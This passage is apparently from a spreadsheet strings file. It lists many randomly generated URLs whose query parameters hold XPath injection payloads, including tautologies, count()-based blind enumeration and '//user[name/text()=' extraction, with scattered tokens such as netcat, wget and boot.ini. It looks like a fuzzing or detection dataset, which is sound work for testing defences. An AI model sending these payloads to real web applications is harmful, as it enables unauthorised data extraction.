    <t>/3lsetcm7/aosnt/77/rv6rqsawo2tp2/jdnngbctacrv9w/pno8te8dtrepgiatast.aspx?re2rfn9orbdi=gas-$2a&amp;bedsf=riieobm3j&amp;rv=processing-instructiononph-htpass2tmohagfi=btt[r&amp;tpw0=&amp;p&amp;latrzr=(i+++&lt;+++count(xxnusr/child::text())+++and++++j++&lt;+++++count(sdn/child::comment())+and+++k+++&lt;+++++count(usli/child::*)++)&amp;ekswtotsall=ni&amp;binunhau&amp;ehrilsri=osevg&amp;iettd3pos=t7fasvtpm&amp;dasenejzunro=iyrsv0o3</t>
  </si>
  <si>
    <t>/g8nonhk0u@/llwy-rssk70tg/y3rei/s6/rnhfdtapipr9ynane/ncky0rf1hbofeeeg.jpg?ea9i=6qstfdrisktgoaar&amp;lib95.q7groupby8f=[&amp;okv7.0=(i+++&lt;+count(latei/child::text())++and++j+&lt;+count(dar/child::comment())+++and+++k+++++&lt;++++count(imi/child::*)+++)&amp;emwkbeime=ct4c&amp;kt@oqmqrqxml@=erformhtacces&amp;edglr=uejrm@:&lt;eopmocha7has9ve&amp;7ykohwj1=lpe1-&amp;llca=3151&amp;f00albiio=237&amp;gltc=liu5&amp;dnito3ed=\\et&amp;nijt49rbersaoss=155682&amp;pn4w0oh=acmoter&amp;mdte=n8uh(&amp;saarndcir+jc&amp;k3ljl=3222</t>
  </si>
  <si>
    <t>/3oyqlt593.ywekico/he/2c9awtitreethtd/trqa7ethuoeg/oioi8e34ntiyeea8/thohdyvtp/b6fwjhgw3sl/s9smorcnell/iia9binan/mjf_pe_fjlbgdryke4/ha1ddll64t/h_djshxzvpplp.exe?ulnbsle=7&amp;asp=nfusjxndsaef1t&amp;nmni2kssogevnu=nejop7e&amp;noo7cbroeaw0osa=abf&amp;hsrcts=8346&amp;nnoecntiykhdx=homeuljloinph-betweeno=&amp;co2i=10&amp;msda7=900&amp;h6eneryoi=442175&amp;cnavuafutae=ajse/os/yjmmla/child::node()[++position()=3]++|++1enany/tnn2o/sidc/child::text()[position()=61]+++++or+'atgaes'+=+++'&amp;reetond3e=s45nw</t>
  </si>
  <si>
    <t>/dxi4zomxwu8-d/dlliax81fk7a3.png?infordte=93e|&amp;4uidat8ausnete=6t3tlabz'++++or+++++1&lt;+++++sslg4/osyh/e/child::text()[position()=8]+or++'z6'++++=+'&amp;tteoige07dd0tcr=4794</t>
  </si>
  <si>
    <t>/6dsamgau-gbjvtrp/ho/aunh/ks8witrsi/zuo_ytibxdwimchmox-.sh?eoa=94904&amp;c4qxmleiguduc=cvlg4d&amp;iex2e4akjcartdl=daslsock_streameote&amp;armnseese2boosr=taej']++++|+++p++|+//user[+++name/text(++)++='hacs</t>
  </si>
  <si>
    <t>/ca/dohhoeitnihlhoreed/8stl6ywn/iu2nttpeehret/rete/etjsaxgmlu7p/tb3dk49pbki.nsf?lmh@ajb@m1=smhatcyn2&amp;muqfrom=econnect9]e4m&amp;hnx=eftd&amp;tis5w=bts2eruededd6mnwi&amp;rheii5otshdsef=s&amp;dulouolho6eufui=(i++&lt;++++count(odthe/child::text())+and+++j+&lt;+++count(il3d/child::comment())+++and+++k+&lt;+++count(tensks/child::*)+++++)&amp;qob63lq=t79hd6&amp;n9ltaya=ssa=c&amp;k0cnnmpo=|andtytkf9op&amp;ylieinnoy=etarmhwoi7tpsr&amp;nnhaooliuges4c=o:e&amp;emtdeda=kkstyleld3malm0o7=&lt;o+e&amp;tmmduh=2099210</t>
  </si>
  <si>
    <t>/c3vfjcvnnd_rvsu/i3j.shtml?cos6bfrer9ftgc=yzhhoechotxm&amp;usamtso&amp;m2shceo=e1rtistneun&amp;cs5wk0a=0tlhomeamt+pinb'&gt;qn&amp;db3=aohtiseontp&amp;ajlit=+je0e&amp;lsf386=womwo7cew&amp;sur3tndhe6crv=56195646&amp;sis=z1rnurnu'++++or+meto/etiql/child::node()[processing-instruction()=29]+++or++++'oss3n'++++='&amp;tfsn0r1drnavlen=162</t>
  </si>
  <si>
    <t>/ao6leitsieu3whefm2ee/ez4/bzdqomfl8nscct7iwmz/oredvebgn/bxjlos9kn_ybi/veooecsasthyrtle0/t@5p.c-b3.4by.pl?aitm5eqr=lexeeel5e&amp;mqtinldncnanrsj=gt9rm_sl&amp;uhavingw5hpxsock_streamlrh=whereesli&amp;tad=gisd'+or+1&lt;++++9sdsnm/t3/aensd/child::text()[position()=34]+++or++++'rui2naoh'++=++++'&amp;teratuueoseo=ueggnscie5mchbsd9&amp;ehooaasts6=bj-t-pdj&amp;fz_9tand1xar=tyu.4-qwlin8</t>
  </si>
  <si>
    <t>/42prie/mdc8vc/tklpzx/xdllix_fhttps0rdocumentc/yzzmvmt/eo7eh27nce0_uqwui/2osnnet3rnh5s.asmx?ereeneni8e=m4+&amp;r5p3osnnfcant=+a6apstyledhnodlhe=e&amp;sxaioarmeru=tezyx&amp;replaceb3fynfbkpzn=gggkw8&amp;e3y5vaossraeenj=eg@&amp;.g24mkz2=38289+++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|++++path/child::*()[position()=(k+1)])=1++or++++0154=&amp;l2pdek-pkf=n9sl4&amp;woyj0t9nalj=pesol5iau7ia1&amp;ieiaeqk=48si;&amp;lbyf6oa0tne=b+erlnq&amp;pstpeptoef=spgmvlwv&amp;luudemerpsimi=(etmn|&amp;eh4=idgfhob</t>
  </si>
  <si>
    <t>/cd7ae7jgzpfuibin/cqjw1.p/dne06ohei/n5u6iaem1icor5ten/vseksod8aaee5tt/r440cvn@a/to/s5z4xzmzwcys/6xdyxtl/ufyxmmmm2e-7en.tiff?rhlecosrn7cmrn=le&amp;ieout=sekqdr+/pe&amp;o2oqneopsu=256140&amp;up=vndy+�v&amp;g4deogt=txv&amp;q16jautoexec0mx9=rdesxp_-2cator&amp;sqqt3curt9st=t.rh2qom1pl&amp;c9lms=0ps+h1&amp;usrrzokpod=+&amp;vpbboechoeizfk=ldoit4wto|n+rr&amp;nabcioswts=(i+++&lt;++count(ci/child::text())++and++++j+++&lt;+count(ie5/child::comment())++++and++k+++++&lt;++count(ljwrsn/child::*)++++)</t>
  </si>
  <si>
    <t>/gln/xiccws8-zeztic/wubveafgawgetd@/al.vg0hqjgij@/omvon1adr7ojdqqnjnaz/1t0uybys_m4qvo/9lne4cigm.php3?h81atdoox=9&amp;tltetaa=c83nc&amp;tti2m=99402&amp;sohse=s6o+35suifiqpe4&amp;iitg6hzy=i9nt'+++++or+++(i+&lt;++count(rurti/child::text())+++++and+++++j+++&lt;+++++count(eima/child::comment())+++and++k+++&lt;+++++count(bfnmya/child::*)++++)++++or++++'4ps'+=+++'++uauee'+or&amp;catnrz=lxpyy9fqk&amp;segnfadil=52581&amp;myasematith4b=ruic6rel0leduof&amp;tnfmeoec1ihr=75565480&amp;dnternee=9998&amp;3toqtn=83403450&amp;rpt11r1=3esoeg&amp;ntotot=etnc&amp;ieefsdioe=e@erlhh</t>
  </si>
  <si>
    <t>/5gew0.swf?0blao=246&amp;edlot3nstd=dm3c6qtanngsernreo&amp;eg=wbfpfe&amp;me9tithr=ddw0@&amp;prmknull@xrinr=99628&amp;tz2rit3dytioes=attek&amp;he=25551+or++++count(path/child::node()[position()=((i+j+k+l+1)]++++|+path/child::*()[position()=(k+1)])=1+++++or+820=&amp;nroa=aerusxtt1sc&amp;5dfusr=72315092&amp;cref=5&amp;3epsdoehrohblag=orolp1k6yvb&amp;inauw=1mdll&amp;v4ys=0gy8vxw</t>
  </si>
  <si>
    <t>/arin5bpqnkjnzyr-/u9xirhsp.msf?mdeakayhsorrci=raeet5ash&amp;npedolooutoaen=53188&amp;sseepeeb6ra=am6'+++++or+(i+++++&lt;+++++count(ii/child::text())+and++j+++&lt;++++count(ndar/child::comment())+++++and+++++k++++&lt;++count(seace/child::*)+)+++or++++'oenietv'=++'+f3lu'++or&amp;niha5yau9ttr=4&amp;i7i=82&amp;aotee=suo&amp;eplncfnptru=fy3ht&amp;dse=|m'uusrhomevae'cih+ndin&amp;rtnonefheedid=6502578&amp;8cv5wudsys=btmeqs2ecnqias&amp;rtxioeno8=evaa6.l&amp;odcep=ua5rcpi&amp;cnoinh0=enu&amp;bso60netadr=usat</t>
  </si>
  <si>
    <t>/nfm@iduzfye_/6epusmhy/t2xfzu/tmpudexec_rnewctyn/oaanuvv4oiel/dalorto8enseythat/y_73m1l16oq/wbdllgmai.gif?ha=7hr47jexecmldb&amp;creinwnl=ubuub&amp;ht5zwqfrompv=471016&amp;b.kreetvocd=ema'+or+++path/child::node()[position()=n]++or++++'ajo'+=++++'&amp;7gei=fetcimgformh4&amp;draa=n225enlco&amp;heebaunokou=156240198</t>
  </si>
  <si>
    <t>/b7bn7juxce/5zysf@o/tacgaeernmiwbelz/3sluw3q/iutjtu.bin?7tv=a6iz8g.@y4&amp;q4wwmd2=443567&amp;ssdo=nitoae/hj/idng3/child::node()[+++position()=45]+++++|+++hmh/r5yefi/oc/child::text()[position()=2]+or+++'o7'++=+++'&amp;eorxces480t=xdnarwniypsarw&amp;edekgn3phi=ra@&amp;nl5b9tasaeuhe6=hl&amp;on2nith9fn=tnbrmocha</t>
  </si>
  <si>
    <t>/stesn.js?@jmstyles-qob=trxaeh'+or+(i+++++&lt;++++count(dhacm/child::text())++and+++j++&lt;+count(yhlqo/child::comment())+++and++k++++&lt;++++count(fef/child::*)++++)++++or+++++'daieaqpw'+=+'+++mh0lie'+++or&amp;qliblwopdxp-=etgf-cesryk</t>
  </si>
  <si>
    <t>/oa3soeutobr/td8litfq6tsinaa/1j_oirmf8ci3.shtml?npiy=a/i2lt/rihoce/child::node()[position()=61]+++++or+'aenfe'+=++++'&amp;mswmtoioe9r=069675333&amp;3adiudotsyrfal=8r2ltrihe29a8vle&amp;1aesyucac=8947065&amp;tmwhzhnnls=eihuulyz&amp;oahc=eld&amp;il=9392885479&amp;.metajimh=adxx3o&amp;ceuux35ua=)c0a3omuedspa$e?gsa&amp;sn=4480679</t>
  </si>
  <si>
    <t>/eg/hd5auis5gnm2utd.css?sw9iyaicdnrti0=hnn0otleth7wcan&amp;osherz1salni=buy&amp;inobject-v=iae8/mori/osi/child::node()[position()=4]+or+'qua'+=+'&amp;rylwoeslyrkbesu=14179&amp;70o=100833</t>
  </si>
  <si>
    <t>/d2e-m/inddv5x/c@uvfs1p-9wiidjk/p_s_3zl8x1/abj@ge/edk4_zxg/acywc/lo@kxujlp7omt/h97dkf.mdb?608pi.u=xm&amp;ytoaa5udlsml=iaardelete(scrmr=e+ien&amp;fcgnlinsu4g4u=oiof6obsetc&lt;o%o&amp;ieetuuastoj=6+or+++++edesa/n2ht6/zsu/child::node()[position()=120]++or+++++2=&amp;b1cstaeae7=ewumn5hk&amp;oeeitl=ia&amp;iree=txf5qadehm&amp;4tee=+y4ee&amp;rpa3ixwdnti9=rtg1y4stru1etri&amp;eso=nmi+&amp;2ts=+lsr&amp;wotn9=tapae8seitotmn&amp;yeen=03728&amp;eteeiotdeeiiu=ltneeem1halerlte</t>
  </si>
  <si>
    <t>/nir/i_zofocr9zpiei4xwima/o1ycp2syhuvorswwd13/3a.r64ujnxni.bin?taoendflnoro=i3&amp;wgetlsi9ow=ws'++++or+++++count(++path/child::node()[position()=((++i++++++++j++++k++++l+++1)]++++|++path/child::*()[position()=(k+1)])=1+++++or+++++'ra'='+tnr7e'++or&amp;l8ondhwehwcacl=73349&amp;ateh=71393&amp;ar40rieee=rddrop&amp;a69ridamarotrq=dogchk2a&amp;ous7merlelt=22183&amp;fne1dauei=230607800&amp;sea=uzc+)&amp;beedq=hbuewy5pnt8j</t>
  </si>
  <si>
    <t>/yinlwsedade/keeeqctcldhneenlic/aln/wfvqtlq5q-4/ez8k3tk_/5snerux9mal9dttnpc/pimhb0/koaatxjjobqimqwqmfmx/ktoii/hd./heee2thiaocseolil.png?ege=+tvarl&amp;daosle=mslmsom6v&amp;ry=stdinudroppa80+u[tmp&amp;rdhhw=bdr&amp;o7seorctltzken=ssc-f&amp;maqhsll=xtermmwp-u7deleteae&amp;vndninsert=4ti)bin&amp;aoftarllatahe=res1hdgevnkalcreh&amp;dcs_w0dn=9450&amp;eolk=etb2n&amp;sv=eusr&amp;6u2ritxv=2++++or+++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1++++or+++53845=&amp;5nesqlpstetel=sneweval</t>
  </si>
  <si>
    <t>/etigrttrrose/sruixy@-ox1jepthvvdh/ruo2ocp/wyskp9isboitcathehat/5ci/o0l/akrgt2l9s5zmytzk/siaatoq4oxgemteeotna/mj9q7vporm.58.mspx?em0sdlutur68t=r+iea&amp;ptoadara=4dcaotwn6ahqtdtte&amp;eleg=9179391171&amp;lstniieajdl=entnimgmtg&amp;ugn7myob6hd=spf4&amp;s1ii=+ll&amp;optsli=t3esdf&amp;npxseos=lb&amp;0_ox6n3home9q3=dsnj/ds/e/child::node()[position()=793]+++or+++++'cnah'+++=++'&amp;euac2roncoarsoo=?ews&amp;5c8tj=8j.2afa77&amp;dpen1h=r40deacz&amp;d1nbp=eiqap6astylefnetcat&amp;erxeh=hjz&amp;srmbojra=apr</t>
  </si>
  <si>
    <t>/7eenmr0cabtee/eii2/ezj/zdffw98eh5l@4/aeflej06udhafosohe/.dhgz.swf?zeacqtwq=qsreeaqvo&amp;3ti=01891+++++or++++1&lt;+++meopy/i/sdyl/child::text()[position()=494]++++or+543=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/pl23shibnl/metmjeoennntg/onvrqnxii5go@kd6c/14bfkusaqqarzzk0fa7.dll?icayuavebbam=iuugj&amp;nna=oacceptnanu&amp;g6hee=(i+++++&lt;+count(p1/child::text())++and+++j+++&lt;+count(qi/child::comment())+++++and+k+++++&lt;+count(esrr/child::*)++++)&amp;ekbrhlaorzrmoo=wz7&amp;3&amp;crmhe=deo+&amp;rjhru=+a</t>
  </si>
  <si>
    <t>/snltnemndmafompscpa/qzl9_c4tpa-wd@.shtml?7nkzttpa0at=anve&amp;zf4tetepanly1zu=iyseic3ybhs&amp;nrr=284&amp;ksoi9r7itwlo=em4/csnh/enlnm/child::node()[+position()=4]++|+++++w8et/e/h/child::text()[position()=20]+or++++'ff'++='&amp;vet=ie9</t>
  </si>
  <si>
    <t>/isahieiwde/mtomjqk7yra/kifnvf_cexec_efo/nkydneihre/ililyhfets2hth4ta6t/s7/horr/irzvc-g1yv-f6ui5.cgi?nosmbkrllcby4=rs6yhisi&amp;hse=rm\\9&amp;thtdateve8ntcs=recho&amp;txl5blssstl=9819&amp;emse=oeyhrd'++++or+++(i+&lt;+count(the0d/child::text())+++++and+++++j+++&lt;++count(so/child::comment())+and+++++k+&lt;+++count(hmke/child::*)++)+++++or++'aoescye'++++=++'+++ntri'+++or&amp;cabghce=hleaa</t>
  </si>
  <si>
    <t>/3sesalqeaaaraauoeyi/so/aux/nltzmt/oss7eerp3eeah7/stdin-h4pdf-bcy9b/01danda9flmctmpdocument8gn/1it9hl.dga@som.asp?agoc=woinxi'+++++or+r0tcie/oow/child::node()[processing-instruction()=884]+++++or+++'entso'++++=+++'&amp;uww3rpxwindow.openu=elrttl&amp;ieg7=oteyoe%e+7&amp;1tgiipnut=dwiz&amp;zce5ne=60264&amp;oaaoet6oj=hiietmajtsrejt5gmh&amp;9cthlvosistrie=s&amp;aluana7o=8&amp;8hpjmy=p2fmlmtk+]+n</t>
  </si>
  <si>
    <t>/o5eealrcm9vsri/8fwmloxgslwue/n5tpfw6qqg0i/nrea0eyim/olrxt18w-h/pnl2eyb39horehe7e/ejtc/vc.png?jelatras=uxmlx%u&amp;&amp;fhibgsoundps5hu=ttdfaevalwhereaerhaoobject?od'+&amp;iodeo2esttfe=ehel1stvl&amp;u1mocharg=emsso'+++or+++count(+path/child::node()[position(++++)=((i+++j+++++k++++l++++1)]+++++|+++path/child::*()[position()=(k+1)])=1++or+++'eele'++='+heiaged'+or&amp;rrcp0io=nodeahmochab;&amp;yhas=98&amp;ov=bjoc4p&amp;isexkcibrd=herneo7lmiu</t>
  </si>
  <si>
    <t>/n8.jsp?iu1atadvqtaa=56786038&amp;hdoarrs2neo=51ze/b&amp;olesoicsntzteh=3498&amp;jr7z1ij0c=triyiitjeibmet&amp;ukfeiwusmiy9a=netcate&amp;zectrmesgcga=sxu'+or++(i+++&lt;+++count(r5s/child::text())+++++and+++j+++&lt;+count(ulojao/child::comment())++and+++++k+&lt;+++++count(tetwu/child::*)++)++++or+'n9sn'++=++'++qycb'+++++or&amp;43t=35497904&amp;xpxsvirtcfagc=533335&amp;feanna=4618598&amp;i8hwnehieohyca=1&amp;cat8=2997284</t>
  </si>
  <si>
    <t>/hs1key/and70e3qrrhbjkjaj/uqpdnw0atz5iltmpjp/be6ycshagfn0zp2tg/ls7/eeeebe/nisoeretetosnnsme/hnjg-isll@pqmm6xx.jpg?ea=we/iece/iaiona/child::node()[position()=32]+or+++'usaceo'+++=++++'</t>
  </si>
  <si>
    <t>/1d./vc@l5mkjrlc5x/nsaml9xlofse6qd/op02mnrqlxpkgbfajdu.shtml?1r=6&amp;ghemene1onsteb=829194&amp;oasend2h=ileuz&amp;oe=6831480&amp;ksttamaha=n.fntidj&amp;ckcjsdnhghae=sn&amp;_fo29ugda2lj=(i++++&lt;+++count(ey/child::text())+and+++++j++&lt;+++count(1r/child::comment())+++and++k+++++&lt;+++count(aedx/child::*)+)&amp;ueeheusu9iaiwm=tffyb&amp;n1rp-c2e21@=du+w&amp;naues=68643</t>
  </si>
  <si>
    <t>/t.vtnwetsrta_/lisz/hkrt-q0birioceecm/7neeto/t0qdhyk2zti1/eto7seem8es/e-x/ox8cg54bu/lpk/2-guult9passthrupperlhs/b@-v2uma2/tzjobd3ybidf.mdb?9teniarfsey5t=ctimgphpuo.%&amp;nei=ro&amp;dtjirncl6totad=09845&amp;ep=toensieifht&amp;muoeoehnatml=gzoaxse'+++or++o9/8ei/child::node()[processing-instruction()=2]+++or+++'orfirjoe'+++='&amp;ddkasv=gc6aevf@&amp;g7ssrms=y+ee</t>
  </si>
  <si>
    <t>/wqiqacn.pl?n0weholohri5t=lldd']+++++|+++p+|+++//user[++name/text(+++)+=+'isa&amp;xeyc86e=490</t>
  </si>
  <si>
    <t>/08chuttsf0p/2eahuue/aso5wi4d1cerli/ngjlkushbssi8qxv/ym_rbruzwsma1yc/oheobxsx.shtml?6wapvnsndxbmex=iut'+or+eo9uw/cmem/child::node()[processing-instruction()=8]+or+'dte1'='&amp;dehardlayephaea=59&amp;fnevdb3etcwhtmp8=tarlg8+edropar</t>
  </si>
  <si>
    <t>/mf1wvf0xpx1dihoo8dn_/sjn.jsp?enuwi9ii9=5324&amp;gs5geiveuiheu=inuoawoeeeab?servicesz?&amp;3pcv4lpgeb=ar&amp;anaeueeils=no5+i&amp;rcpmwkz=aeeh&amp;hepbdmeeboia=095769&amp;puttz=aac.h0a2&amp;hbeyl8eecq=fqaot']++++|++p++|+++++//user[++++name/text(+)++='4loh&amp;eof4h=nap+eidri~bal</t>
  </si>
  <si>
    <t>/yrdocumenttmpxolctgbody/aredti/dtyccl5bzv/d4eqsbfijgk/9f2hguh3/2qk80g/slbwvuair.jpg?84amescth=sted&amp;hoylfe8eeo=67&amp;nnnee=7sci8r&amp;i1g4loarraba0=6+aedrm�ie88noa5fe&amp;at8eser8lmt=eo-t&amp;c_55-p8=aq&amp;h4ta0lctane=555&amp;ngaar=lneumont&amp;lformu5s=i1s&amp;wceaccess_logfe11services4j=789&amp;dyp9=en'+++++or+path/child::node()[position()=n]+++or+++++'no1iond'+='&amp;@nph-lurfnoaprocessing-instruction=ewas&amp;8shoha=nacnk&amp;hs=r09_nbx2</t>
  </si>
  <si>
    <t>/im6awnzotbtlsets/pnngw27nc/etnphanoyeemsernt/xjj/hjsrd/ooiu2uaow/eqs24lbe2yi/9o9m81rfeaabyealslt/l5vx@3@-hfo0bzs/tb2x4fztx33kacpsud7/la9ltgs5kql2r9ozerl/lr.dll?tee1tsnowet=berno'+++++or+++path/child::node()[position()=n]++++or+++++'hnti'++++=+'</t>
  </si>
  <si>
    <t>/f-cj4wna/eotesbsianle/cory88mfag/hwidivh45epazepr/n.mpsphptautoexecbetweenv/e3moflhw5mr0ec3y.q/o2iairrsihnha79sotu/er.cgi?eeh1=ytrtedia&amp;esa=456&amp;tl3fg==2cmi&amp;6n=7979+++++or+++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++path/child::*()[position()=(k+1)])=1+or+81407=</t>
  </si>
  <si>
    <t>/81gnfbgfy2cpbop91lj/exxoh/e1ktldeqg/deletex2g/of_nng/eise/ixsfq5yfugwyxwqiwy_h/lpok2lqx/oso/d.mmq.css?ftdnoas=hhzt&amp;xhx7et=efcnslfe0k&amp;uyb=77&amp;2pgr5elowcs=s@%+&amp;4d3ebtwttper=oxn.s_jckc5&amp;ym9gnesfx=iessotezmenredtr&amp;8pm9kbuze=y6tehh'+++++or+1&lt;+++rtfc/3ee/mhh/child::text()[position()=72]++or++++'imtrf'+++=++++'</t>
  </si>
  <si>
    <t>/ai/g_jfrucr1/kpzyb8z/tg9tcmsen0tv8orwnnrp/n9py2c5oatb/ucjmbagnva3dtr_y/epkgs.gif?m7=adybgs'+++or+6++&lt;+++++count(path/child::*)+++or++'y0td'='</t>
  </si>
  <si>
    <t>/osnwxbh0qyh9r/snypleesotronea/8onssa6nktwginadib/nii@qt7s/meusrofnseeetgdil/dloetqniaihn/nfsct7eos/mjwkooe2cr.cw/avmjkbw/ys9fosusef/ss0osearoqslafby5.swf?desy=dlcoh&amp;fgprocessing-instructionc=sl~4&amp;httd5ebn0ntbbd=67463++or++++boelme/be/wisked/child::node()[position()=3]++or++54=</t>
  </si>
  <si>
    <t>/tou/wbprgv_sy3ew/z0kp/stoeonhseep/entcrctd6ya/rsig2ahsdoglct8ych/cx/riaitcehlsolcntimsia/iaori/cs.jpeg?fh=to82/hlhxut/aa19le/child::node()[position()=8]+or+++++'oja'+=+'&amp;6ewtnuls3i0b=ejj77ap5i</t>
  </si>
  <si>
    <t>/n8-qsjq/lrlootntosas4dacfna/aj-s2fm.gk@hboe/u5netcatdelete_ustdinjccatsam/ein5wyca/amcgeyz@riip7kn8/lorlncnee9ohnmumihfs/npv/sxeueadl/os2drkhanass/..xx/ef19ayq4rpceh.aspx?ueformm=ehan'++or++++path/child::node()[position()=n]+or+++'ihtbyt'++++=++++'</t>
  </si>
  <si>
    <t>/edvumcj5mcr59urwn/g63shnjxq6-sp/iurl0aseoiraiwtceouh/mk.gif?sr=huhaiw'+++or++++sh7/naout/child::node()[processing-instruction()=785]++or+++++'yeiam1'=+'&amp;lkhhilbaeboo=1&amp;onuatonc=&lt;tcfuwp-eobwee)tdw&amp;eqcbsastsus=3531403&amp;toetevetooed=01&amp;nfvn=soi+6p&amp;3lp.=69753</t>
  </si>
  <si>
    <t>/lqleharus4/wretsestncl9tln/ni/u8ti8/l@ahchild/r0njdq.9t/ne/g4c6chswen/stdintc1copydi7ntvg/klk52nl3lkbqj/1huhzroseeatuaa/okuv_p2pxuja.cfm?smcu3tddhes=reeseh&amp;aofj1n=140&amp;en3ifiggite=37881+++or+++1&lt;+++1arn/dtxu/s/child::text()[position()=4]+++or++++32=']+|+/*+|+/foo[bar='&amp;mw0i2boofe=dmeo0rdtt&amp;h4nofrlrue0gee=241294911&amp;zmst=8123606893&amp;be4htes=soumpsp</t>
  </si>
  <si>
    <t>/l9skhmjopn_/cnk/gj0oldjalo.g8ij/e5vdzwbqbkdeuoyk/hzydgvraew7/seoelrnsitthf/52bn3let.msf?xhtalz=ebe&amp;zm803tbrfd=lreeegfewh5&amp;6eeucessa1aoahe=eil/y6eeng/ulta/child::node()[position()=334]+++or++'rag'+++=++'</t>
  </si>
  <si>
    <t>/6etiixtt/lpwg7/tooe53eer9/wtmttihii5dta/polg@.c9ed.aspx?nta9tta1dn=435&amp;prlese=tfyixzkt&amp;etef=df++nad&amp;waui4hlahr=6&amp;ltqfagax=3++or+++irmni/y3oo/cn2oe/child::node()[position()=676]++++or+++++485=&amp;eehcrk=ohei93+&amp;habtr=104439&amp;hof=4&amp;ealacttthue=04507568&amp;em2nro7=3714</t>
  </si>
  <si>
    <t>/oeez/ez4e5hnfioa/p.6/sqneyr.bin?3ldieduesmkn=rlxpqvnpf-&amp;dzafn=6647&amp;wv1hliwun5=8432&amp;ixzav0a=45+or++++1&lt;++++cteh/its3/ts/child::text()[position()=46]+or+395=']+|+/*+|+/foo[bar='&amp;9oenyzaxtd=l5pabivpeoeatraa7h&amp;thoeswtoaeee=nnwoypm&amp;qtyqay6osxok9=brnar$g(soe%\\&amp;teirutshi2te5id=tatordbeua0nl</t>
  </si>
  <si>
    <t>/dgqreeednopj5imm/rjgwxusz5hizxu.jpg?oabfc=770++++or+++1&lt;+++++ebe/uepitt/ieca/child::text()[position()=132]++++or+++4952=']+|+/*+|+/foo[bar='&amp;t342cl=podpduh910utdshu7&amp;au9coaobtestt=tkurmnan&amp;vrbody.k4=lubkii&amp;eifgrieia=hgnc&amp;o7tdjnnhyyo=brgobnisystem&amp;qfwop2@@k3=81874&amp;eeoiddeemecs6r=533664&amp;nsiinobmyf7=1</t>
  </si>
  <si>
    <t>/ssati3d1coic/reag/aeofliz0/pujhrt.html?hnd=(i++++&lt;++++count(7v/child::text())+and+++++j+&lt;+count(pia/child::comment())++++and+k++&lt;+++++count(ceugo/child::*)++++)&amp;iee=ad</t>
  </si>
  <si>
    <t>/0emz9en1rw/x6hzg/lun1a5shlnitnnrrelw/c6yjobqvmb-p/th8lrwqxghw6qmnptweh/dufzlwqb@a5copymwa/mygnzqnhwjdlyljwegwh/onhlnroi.gif?neeqamzh=nio&amp;&amp;arpeh=u7k&amp;mnp=3510094722&amp;oigichrsahdn=+no+hetw4&amp;senaeraevfhheh=a1gcdvsoz5&amp;ewirdiponi=ie4iaeeez&amp;wtnoi=&amp;+&amp;teast9nzs6=ppoiaeecnhlndce&amp;nondmw=tzsnl/ni/si/child::node()[position()=8]+++++or++'al'++=++++'&amp;2bu3tese5eog=88930267</t>
  </si>
  <si>
    <t>/mndmi6elir/e9geedmaagi/iereronetintiaee3ut/recw2cua.5jo35ioo6v7/f0pxdqinoxz/ahuerheemeoraabah/w8po/oxajrwfscq/ep3/csqgdq@.css?el8eexbofnjcnk=h1re4jekziai&amp;vehhkprpwm=e1nceuiy&amp;eeoywatploie=asxzfrl&amp;xmllos&amp;5f1xp_g3np=+e~&lt;vktn&lt;eup&amp;ovtm=04177+++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+|+++++path/child::*()[position()=(k+1)])=1++or+++++451=&amp;rochwl=driog&amp;a0pmhs8t=mexecchildi+&amp;brimeartrn=ne&amp;egxo2ixxmn6lg=dn0@p_bbj&amp;cuenrtg12seafp=43&amp;y87septsyertai=32sleesprocessing-instructionc3f]5oaeefnn&amp;k95tsphpw=ncaalninhdtur</t>
  </si>
  <si>
    <t>/eowpo2-zppken/v3cbua0pp0k8ii5_cxy/tka/bh/smprbfhr/.wba-homevulcx6t.u/eeaeuaiicoetjt/od-mwv18suw/a5.pl?hstiioev8cipn=4652&amp;tt=sredvbe9ensheyaf4&amp;naaett=+s(s&amp;-t5gxizhvu=eqm5oenqzgcf&amp;cehsnskoi=currfo'++or++1&lt;+++++seym/t9i/tgoie/child::text()[position()=586]+++or++++'qow'++=+'&amp;hi4jmytiii=6nqau</t>
  </si>
  <si>
    <t>/rzniavet9o8s7s2/usbnr1@v7ep0gq/5izi54tishzaheyql.aspx?pa=76986&amp;tieej4=mclid9oe(~mt0&amp;18hd7i4eececr=2+or++++jv/ttnge/eohio/child::node()[position()=4]+or++95114=&amp;wtedi6nbal=nd5mnmsisaeetr&amp;2nf5lsr=l</t>
  </si>
  <si>
    <t>/_ixgq@/77eoenmr/tdkkgmcxpzylzsnhfdd/4aoojoi/206o/io.pl?p8home2=r+rs&amp;zibrzh6l39=28+++++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++++path/child::*()[position()=(k+1)])=1+++++or+++++768=&amp;iydlsexavsde=08435760&amp;hrsonlladlpn2t=48</t>
  </si>
  <si>
    <t>/tq/lerbueem0esiru2irru.asmx?6own=6446+or+++++1&lt;++ttkn/nov6/uro/child::text()[position()=96]+++++or++40=']+|+/*+|+/foo[bar='&amp;ncnhkeotr0hy=peexw</t>
  </si>
  <si>
    <t>/vm1acaaireesta/6e7r.php3?duotendaht=78657657&amp;ono7nqta25l=atsf9&amp;one=:an+oobetweenc&lt;&amp;oecuio=ui80vv68.k&amp;tkotnfllcrle=euto'+++or++++path/child::node()[position()=n]++++or+++++'fnd46hee'++='&amp;pjsv@i6hqo=itdgapttgdaetnpir&amp;7a=l9childonsysokeesep&amp;swei6etrmatuxxm=d&amp;&amp;otdtd=0&amp;eezuwnoee3=m&amp;yscriptinserta</t>
  </si>
  <si>
    <t>/sqnkz.jpeg?5gw=sikhk1o'+++or++++1&lt;+7al/asnoto/tld/child::text()[position()=4]++++or+++'eeegcs'++++=++'</t>
  </si>
  <si>
    <t>/boovsfihah5avrsoaten/7snpr/5yddolftimkqdewti20/tiobnbiolt4dt/v6vbscriptm2l.shtml?ecew8tzso90mb8=9ltaealvbnls'&amp;zj6k7zb=45&amp;sae=eqnk&amp;e05erqbm=eefel7eeadoblrnsns&amp;slyqhtmsqcutar=254269&amp;cen3ustehh=3583136&amp;dihwah=5537793011&amp;odenuane6emble=zqne3a']+++++|++p++++|+//user[++++name/text()++++='gtlc&amp;vanseooeyebo=8641&amp;6ojbz=ehbesifqdhpu&amp;szmr8nhd=s1kkicfr&amp;p5boot.inixspt0=77699&amp;php48cy=ioreplaceform+sftpan1r9&amp;inputcqtwherelocationwv=93670</t>
  </si>
  <si>
